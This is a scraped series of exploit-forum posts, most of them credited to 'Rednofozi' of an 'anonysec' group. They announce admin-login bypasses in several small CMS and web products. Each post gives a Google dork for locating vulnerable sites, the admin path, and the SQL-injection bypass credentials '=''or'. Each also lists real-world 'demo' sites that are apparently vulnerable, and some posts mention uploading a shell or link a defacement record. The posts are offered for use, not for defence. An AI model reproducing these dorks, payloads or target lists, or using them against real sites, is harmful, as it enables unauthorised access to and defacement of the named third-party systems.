  20. ,--^----------,--------,-----,-------^--, | ||||||||| `--------' | O .. by Rednofozi anonysec hackers iran .. `+---------------------------^----------| `\_,-------, _________________________| / XXXXXX /`| / / XXXXXX / `\ / / XXXXXX /\______( / XXXXXX / / XXXXXX / (________( `------' ==================================================================================== # Exploit Title: Brazil CMS admin Bypass and SQL Injection Vulnerability # Exploit Author: Rednofozi # Date:29-09-2018 # Email: Rednofozi@yahoo.com # Vendor Homepage: www.hamilimoveis.com.br # OUR SITE : https://anonysec.org/ |==================================================================================== # {INFO} # Page Admin : site.br/adm Bypass User & Pass : '=' 'or' |==================================================================================== # {DORK} # " inurl:detalhes_imovel.php?Cod= site:br' |==================================================================================== |==================================================================================== # {DEMO} # 01: http://www.ubatubaceliolocacoes.com/detalhes_imovel.php?Cod=41 # 02: http://www.imoveismanduri.com.br/detalhes_imovel.php?Cod=71 # 03: http://www.hamilimoveis.com.br/detalhes_imovel.php?Cod=137 # 04: admin bypass and SQL Injection # 05 # 06: # 07: # 08: # 09: # 10: |==================================================================================== # {TNX For} # >>> Thanks To: ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow # >>> Discovered By :Rednofozi |==================================================================================== The END ; Good Luck :D:D:D http://www.exploit4arab.org/exploits/2054
  21. Admin Panel Bypass Exploit: GOOGLE DORK: intext:Copyright © 2018 九江市文化旅游发展集团有限公司官方网站 版权所 Author:Mustafa Öztaş Date:29/09/2018 Admin Panel Path:website/root/login Tested On:Windows Category:WebApps Exploit Risk:medium Username/Password: Username:'=''or' Password:'=''or' Demo: http://www.jjwenlv.com/root/login.php Username:admin Password:'=''or'
  22. ,--^----------,--------,-----,-------^--, | ||||||||| `--------' | O .. by Rednofozi anonysec hackers iran .. `+---------------------------^----------| `\_,-------, _________________________| / XXXXXX /`| / / XXXXXX / `\ / / XXXXXX /\______( / XXXXXX / / XXXXXX / (________( `------' ==================================================================================== # Exploit Title: Image Hosting script admin page bypass vulnerability / upload shell # Exploit Author: Rednofozi # Date:26-09-2018 # Email: Rednofozi@yahoo.com # Vendor Homepage: www.codefuture.co.uk # OUR SITE : https://anonysec.org |==================================================================================== # {INFO} # admin bypass Vulnerability |==================================================================================== # {DORK} # intext:"Powered By CF Image Hosting script |==================================================================================== # {POC} # admin page: # site.com/admin # exploit: # Username: '=''or' # password: '=''or' # # zone-h test hacked http://www.zone-h.org/mirror/id/31702111 |==================================================================================== # {DEMO} # 01: http://www.irtci.ir/pic/admin.php # 02: hhttp://image4web.net/admin/ # 03: https://admin.serconi.es/admin # 04: and upload shell # 05: # 06: # 07: # 08: # 09: # 10: |==================================================================================== # {TNX For} # >>> Thanks To: ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow # >>> Discovered By :Rednofozi |==================================================================================== The END ; Good Luck :D:D:D http://www.exploit4arab.org/exploits/2051
  23. Rednofozi

    Pro-Exploit

    **************************************************************** # Exploit Title: Patron Info Admin Login Bypass [+] # Google Dork: "N/A" [+] # Date: 21/09/2018 [+] # Author: Rednofozi [+] # Vendor Homepage :http://patroninfosystem.com/ [+] # Team: https://anonysec.org [+] # Tested on: Kali Linux [+] ***************************************************************| |[+] Exploit : | |[+] | |[+] http://site.com/myadmin site.com/login.php | Then If The Admin Page Comes,Use These Usernames And Passwords | | Username : '=' 'OR' | Password : '=' 'OR' | | | |--------------------------------------------------------------| |[+] Demo:- | |[+] Demo : http://www.drnavneet.com/ | |[+] | |[+] | |[+] | |--------------------------------------------------------------| **************************************************************** http://www.exploit4arab.org/exploits/2041
  24. Rednofozi

    Pro-Exploit

    *************************************************** # Exploit Title: Digital Media Admin Panel Bypass # Google Dork: intext:"Design by Third Eye Digital Media. " # Date: 18/09/2018 # Author:Rednofozi # Team: https://anonysec.org # Tested on: Windows 10 x64 *************************************************** [+] Search the dork in Google [+] Open target [+] Give exploit /admin in the raget [+] Enter username and password with [+] Username: '=''or' [+] Password: '=''or' [+] Vuln? You redirected to dashboard *************************************************** [+] Demo Site [+] http://liveindia.ind.in/admin/ [+] http://gujaratmart.in/admin/ [+] http://boditoday.com/admin/ [+] http://seasonsshop.in/admin [+] http://demonshop.in/admin/ *************************************************** Discovered by : Rednofozi Thanks To: ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/2039
  25. *************************************************** # Exploit Title: Synergy Syscom Pvt. Ltd. Admin Login Bypass # Google Dork: inurl:Website Designed & Developed By Synergy Syscom Pvt. Ltd. # Date: 17/09/2018 # Author: Rednofozi # Team: https://anonysec.org # Tested on: Windows 10 x64 *************************************************** [+] Search the dork in Google [+] Open target [+] Give exploit /admin in the raget [+] Enter username and password with [+] Username: '=''or' [+] Password: '=''or' [+] Vuln? You redirected to dashboard *************************************************** [+] Demo Site [+] http://www.vijaycourier.com/admin [+] http://psb-online.smkn3maumere.sch.id/admin/ [+] http://www.synergysoftwares.biz/admin [+] http://potensinusantara.com/admin/ [+] http://ppdb.sman2-ungaran.sch.id/admin *************************************************** Discovered by : Rednofozi Thanks To: ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/2038